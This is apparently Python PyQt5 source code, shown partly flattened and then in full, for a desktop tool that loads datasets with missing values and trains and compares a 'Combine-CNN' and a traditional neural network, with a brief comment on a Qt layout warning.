16)) label = QLabel('Present Data:') label.setFont(QFont('微软雅黑', 16)) self.presentDataName = QLabel('None') self.presentDataName.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentDataName) dataModule.addStretch(1) dataModule.addLayout(labelbox) dataModule.addStretch(1) dataModule.addWidget(self.dataFileChooseButton) dataModule.addStretch(1) dataModule.addWidget(self.dataLossSimulateSettingButton) dataModule.addStretch(1) dataModule.addWidget(self.dataShowButton) dataModule.addStretch(1) ###### training module ######## trainingModule = QVBoxLayout() self.setModelParametersButton = QPushButton('Model Parameters') self.setModelParametersButton.setFont(QFont('微软雅黑', 16)) # self.setTrainingParametersButton = QPushButton('Trainning Parameters') # self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16)) self.trainingButton = QPushButton('Training') self.trainingButton.setFont(QFont('微软雅黑', 16)) self.saveModelButton = QPushButton('Save Model') self.saveModelButton.setFont(QFont('微软雅黑', 16)) self.loadModelButton = QPushButton('Load Model') self.loadModelButton.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Model:') label.setFont(QFont('微软雅黑', 16)) self.presentModelName = QLabel('None') self.presentModelName.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentModelName) trainingModule.addStretch(1) trainingModule.addLayout(labelbox) trainingModule.addStretch(1) trainingModule.addWidget(self.setModelParametersButton) trainingModule.addStretch(1) trainingModule.addWidget(self.trainingButton) trainingModule.addStretch(1) trainingModule.addWidget(self.saveModelButton) trainingModule.addStretch(1) trainingModule.addWidget(self.loadModelButton) trainingModule.addStretch(1) ############## new 
cnn result show ###### resultShowModule = QVBoxLayout() self.showResultButton = QPushButton('分类结果展示') self.showResultButton.setFont(QFont('微软雅黑', 16)) self.judgeResultButton = QPushButton('分类结果评估') self.judgeResultButton.setFont(QFont('微软雅黑', 16)) resultShowModule.addWidget(self.showResultButton) resultShowModule.addWidget(self.judgeResultButton) ################# new algorithm ui ########## hboxTop = QHBoxLayout() hboxTop.addStretch(1) mcnnLabel = QLabel('Combine-CNN:') mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold)) hboxTop.addWidget(mcnnLabel) hboxTop.addStretch(1) hboxTop.addLayout(dataModule) hboxTop.addStretch(1) hboxTop.addLayout(trainingModule) hboxTop.addStretch(1) hboxTop.addLayout(resultShowModule) hboxTop.addStretch(1) #########traditional data module########## dataModuleT = QVBoxLayout() self.dataFileChooseButtonT = QPushButton('选择数据') self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16)) self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数') self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16)) self.dataPreProcessButtonT = QPushButton('数据预处理') self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16)) self.dataShowButtonT = QPushButton('展示数据') self.dataShowButtonT.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Data:') label.setFont(QFont('微软雅黑', 16)) self.presentDataNameT = QLabel('None') self.presentDataNameT.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentDataNameT) dataModuleT.addStretch(1) dataModuleT.addLayout(labelbox) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataFileChooseButtonT) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataLossSimulateSettingButtonT) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataPreProcessButtonT) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataShowButtonT) dataModuleT.addStretch(1) ###### training module ######## trainingModuleT = QVBoxLayout() self.setModelParametersButtonT = QPushButton('Model Parameters') self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16)) self.trainingButtonT = QPushButton('Training') self.trainingButtonT.setFont(QFont('微软雅黑', 16)) self.saveModelButtonT = QPushButton('Save Model') self.saveModelButtonT.setFont(QFont('微软雅黑', 16)) self.loadModelButtonT = QPushButton('Load Model') self.loadModelButtonT.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Model:') label.setFont(QFont('微软雅黑', 16)) self.presentModelNameT = QLabel('None') self.presentModelNameT.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentModelNameT) trainingModuleT.addStretch(1) trainingModuleT.addLayout(labelbox) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.setModelParametersButtonT) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.trainingButtonT) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.saveModelButtonT) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.loadModelButtonT) trainingModuleT.addStretch(1) ############## traditional nn result show ###### resultShowModuleT = QVBoxLayout() self.showResultButtonT = QPushButton('分类结果展示') self.showResultButtonT.setFont(QFont('微软雅黑', 16)) self.judgeResultButtonT = QPushButton('分类结果评估') self.judgeResultButtonT.setFont(QFont('微软雅黑', 16)) resultShowModuleT.addWidget(self.showResultButtonT) resultShowModuleT.addWidget(self.judgeResultButtonT) ####### traditional algorithm ######### hboxBottom = QHBoxLayout(self) hboxBottom.addStretch(1) traditionNNLabel = QLabel('Traditional NN:') 
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold)) hboxBottom.addWidget(traditionNNLabel) hboxBottom.addStretch(1) hboxBottom.addLayout(dataModuleT) hboxBottom.addStretch(1) hboxBottom.addLayout(trainingModuleT) hboxBottom.addStretch(1) hboxBottom.addLayout(resultShowModuleT) hboxBottom.addStretch(1) ########## whole frame layout ######## splitterLine = QLabel(self) splitterLine.setFont(QFont('Times', 1)) col = QColor(0, 0, 0) splitterLine.setStyleSheet("QWidget { background-color: %s }" % col.name()) splitterLine.resize(splitterLine.sizeHint()) vbox = QVBoxLayout() vbox.addLayout(hboxTop) # vbox.addWidget(QLabel(str('_'*int(self.width()/3)))) vbox.addWidget(splitterLine) vbox.addLayout(hboxBottom) mainWidget = QWidget() mainWidget.setLayout(vbox) self.setCentralWidget(mainWidget) self.setGeometry(350, 100, self.windowLength, self.windowHigh) self.setWindowTitle('适用于有缺失值数据集的神经网络系统') self.show() def initConnect(self): self.dataFileChooseButton.clicked.connect(self.chooseData) self.dataFileChooseButtonT.clicked.connect(self.chooseData) self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter) self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter) self.dataShowButton.clicked.connect(self.showData) self.dataShowButtonT.clicked.connect(self.showData) self.dataPreProcessButtonT.clicked.connect(self.preProcess) self.setModelParametersButton.clicked.connect(self.setModelParameters) self.setModelParametersButtonT.clicked.connect(self.setModelParameters) self.trainingButton.clicked.connect(self.training) self.trainingButtonT.clicked.connect(self.training) self.saveModelButton.clicked.connect(self.saveModel) self.saveModelButtonT.clicked.connect(self.saveModel) self.loadModelButton.clicked.connect(self.loadModel) self.loadModelButtonT.clicked.connect(self.loadModel) self.showResultButton.clicked.connect(self.showResult) self.showResultButtonT.clicked.connect(self.showResult) self.judgeResultButton.clicked.connect(self.showJudge) self.judgeResultButtonT.clicked.connect(self.showJudge) ############ data load module ##################### def chooseData(self): if self.sender() is self.dataFileChooseButton: self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)') if ok: # dataname = self.fname['New'].split('/')[-1].split('.')[0] # # print(dataname) # self.presentDataName.setText(dataname) # self.presentDataName.resize(self.presentDataName.sizeHint()) self.loadData() elif self.sender() is self.dataFileChooseButtonT: self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)') if ok: # dataname = self.fname['Tra'].split('/')[-1].split('.')[0] # # print(dataname) # self.presentDataNameT.setText(dataname) # self.presentDataNameT.resize(self.presentDataNameT.sizeHint()) self.loadData() return def loadData(self): if self.sender() is self.dataFileChooseButton: try: self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New']) # print(self.dataFor['New'].DataTrainX, '\n', self.dataFor['New'].DataTrainY) except FileNotFoundError as e: reply = QMessageBox.information(self, 'Message', "Data file not exist", QMessageBox.Yes, QMessageBox.Yes) return except Exception: reply = QMessageBox.information(self, 'Message', "Data file format error", QMessageBox.Yes, QMessageBox.Yes) return dataname = self.fname['New'].split('/')[-1].split('.')[0] # print(dataname) self.presentDataName.setText(dataname) 
self.presentDataName.resize(self.presentDataName.sizeHint()) elif self.sender() is self.dataFileChooseButtonT: try: self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra']) # print(self.dataFor['Tra'].DataTrainX, '\n', self.dataFor['Tra'].DataTrainY) except FileNotFoundError as e: reply = QMessageBox.information(self, 'Message', "Data file not exist", QMessageBox.Yes, QMessageBox.Yes) return except Exception: reply = QMessageBox.information(self, 'Message', "Data file format error", QMessageBox.Yes, QMessageBox.Yes) return dataname = self.fname['Tra'].split('/')[-1].split('.')[0] # print(dataname) self.presentDataNameT.setText(dataname) self.presentDataNameT.resize(self.presentDataNameT.sizeHint()) return def setLossParameter(self): if self.sender() is self.dataLossSimulateSettingButton: self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New') elif self.sender() is self.dataLossSimulateSettingButtonT: self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra') # print(self.dataLossRate) # print(self.dataSetLossValue) return def showData(self): if self.sender() is self.dataShowButton: # print(1) self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New') elif self.sender() is self.dataShowButtonT: # print(1) self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra') return def preProcess(self): if self.dataFor['Tra'] is None: reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理', QMessageBox.Yes, QMessageBox.Yes) else: self.dataFor['Tra'].MeanPreProcess() reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes) return ############## training module ################# def setModelParameters(self): if self.sender() is self.setModelParametersButton: # print(1) self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New') elif self.sender() is self.setModelParametersButtonT: self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra') def training(self): if self.sender() is self.trainingButton: if self.trainingW is not None: self.trainingW.hide() # print(self.trainingW) self.trainingW.show() return senderName = 'New' elif self.sender() is self.trainingButtonT: if self.trainingWT is not None: self.trainingWT.hide() self.trainingWT.show() senderName = 'Tra' if self.dataFor[senderName] is None: reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练', QMessageBox.Yes, QMessageBox.Yes) return elif senderName == 'New': if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv: reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes) return if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\ < self.combineNumPooling: reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes, QMessageBox.Yes) return # print(self.trainingW) if self.trainingWT is not None: reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes, QMessageBox.Yes) return self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName) self.traingWidgetOnFlag[senderName] = False elif senderName == 'Tra': if self.trainingW is not None: reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束', 
QMessageBox.Yes, QMessageBox.Yes) return self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName) self.traingWidgetOnFlag[senderName] = False return def saveModel(self): if self.sender() is self.saveModelButton: if self.mcbcnn is None: reply = QMessageBox.information(self, '模型错误', '模型不存在', QMessageBox.Yes, QMessageBox.Yes) return else: fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\myCombineCNN.cbcnn.json', 'Combine-CNN json files (*.cbcnn.json)') if ok: succeed = self.mcbcnn.saveModel(fname) if succeed: reply = QMessageBox.information(self, '保存结果', '模型保存成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) elif self.sender() is self.saveModelButtonT: if self.trann is None: reply = QMessageBox.information(self, '模型错误', '模型不存在', QMessageBox.Yes, QMessageBox.Yes) return else: fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\traditionalNN.trann.json', 'Traditional NN json files (*.trann.json)') if ok: succeed = self.trann.saveModel(fname) if succeed: reply = QMessageBox.information(self, '保存结果', '模型保存成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) def loadModel(self): if self.sender() is self.loadModelButton: fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..', 'Combine-CNN json files (*.cbcnn.json)') if ok: if self.mcbcnn is None: self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling) succeed = self.mcbcnn.setModel(fname) if succeed: modelName = fname.split('/')[-1].split('.')[0] self.presentModelName.setText(modelName) reply = QMessageBox.information(self, '设置结果', '模型设置成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) elif self.sender() is self.loadModelButtonT: fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..', 'Traditional NN json files (*.trann.json)') if ok: if self.trann is None: self.trann = traditionalNN.traditionalNN(None) succeed = self.trann.setModel(fname) if succeed: modelName = fname.split('/')[-1].split('.')[0] self.presentModelNameT.setText(modelName) reply = QMessageBox.information(self, '设置结果', '模型设置成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) return def showResult(self): if self.sender() is self.showResultButton: if self.traingWidgetOnFlag['New']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New') elif self.sender() is self.showResultButtonT: if self.traingWidgetOnFlag['Tra']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra') return def showJudge(self): if self.sender() is self.judgeResultButton: if self.traingWidgetOnFlag['New']: reply = 
QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set', self, 'New') elif self.sender() is self.judgeResultButtonT: if self.traingWidgetOnFlag['Tra']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set', self, 'Tra') # self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train') # self.mcbcnn.runCNN('Test', self.dataFor['New']) # drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1)) # drawCM.plotConfuseMatrix() if __name__ == '__main__': app = QApplication(sys.argv) myMainWindow = MyMainWindow() sys.exit(app.exec_())
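One construction detail worth flagging in the PyQt5 entry above: hboxBottom is created as QHBoxLayout(self), which tries to install the layout on the QMainWindow itself even though it is later nested inside vbox on mainWidget; since a QMainWindow already manages its own internal layout, Qt typically prints an "already has a layout" warning at startup. Building it the same way as hboxTop avoids that:

hboxBottom = QHBoxLayout()    # no parent; vbox.addLayout() takes ownership later

Keeping child windows as attributes (self.showDataW, self.trainingW, and so on) is deliberate in this code: it stops Python from garbage-collecting those widgets while they are still on screen.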
[ "import sys\nfrom PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,\n QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QColor\nimport myLoadData\nfrom UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\\\n showJudgeWidgets, chooseJudgeDataSetWidget\nfrom MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement\n\nclass MyMainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.windowLength = 1250\n self.windowHigh = 900\n\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.\n self.dataSetLossValue['New'] = 0.\n\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.\n self.dataSetLossValue['Tra'] = 0.\n\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n\n self.fullConnectOutInRate = 0.5\n\n self.mcbcnn = None\n self.trann = None\n\n self.trainingW = None\n self.trainingWT = None\n\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n\n ####### data module #######\n dataModule = QVBoxLayout()\n\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n\n\n ###### training module ########\n trainingModule = QVBoxLayout()\n\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n # self.setTrainingParametersButton = QPushButton('Trainning Parameters')\n # self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n 
trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n\n ############## new cnn result show ######\n resultShowModule = QVBoxLayout()\n\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n\n ################# new algorithm ui ##########\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(dataModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(trainingModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(resultShowModule)\n\n hboxTop.addStretch(1)\n\n #########traditional data module##########\n dataModuleT = QVBoxLayout()\n\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n\n ###### training module ########\n trainingModuleT = QVBoxLayout()\n\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n\n ############## traditional nn result show ######\n resultShowModuleT = 
QVBoxLayout()\n\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n\n ####### traditional algorithm #########\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(dataModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(trainingModuleT)\n\n hboxBottom.addStretch(1)\n\n hboxBottom.addLayout(resultShowModuleT)\n\n hboxBottom.addStretch(1)\n\n ########## whole frame layout ########\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet(\"QWidget { background-color: %s }\" % col.name())\n splitterLine.resize(splitterLine.sizeHint())\n\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n # vbox.addWidget(QLabel(str('_'*int(self.width()/3))))\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n\n self.setCentralWidget(mainWidget)\n\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n\n############ data load module #####################\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataName.setText(dataname)\n # self.presentDataName.resize(self.presentDataName.sizeHint())\n self.loadData()\n\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')\n if ok:\n # dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # # print(dataname)\n # self.presentDataNameT.setText(dataname)\n # self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n self.loadData()\n\n return\n\n\n def loadData(self):\n if self.sender() is 
self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])\n # print(self.dataFor['New'].DataTrainX, '\\n', self.dataFor['New'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n # print(self.dataFor['Tra'].DataTrainX, '\\n', self.dataFor['Tra'].DataTrainY)\n\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message', \"Data file not exist\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n except Exception:\n reply = QMessageBox.information(self, 'Message', \"Data file format error\",\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n # print(dataname)\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')\n\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')\n\n # print(self.dataLossRate)\n # print(self.dataSetLossValue)\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')\n\n elif self.sender() is self.dataShowButtonT:\n # print(1)\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = 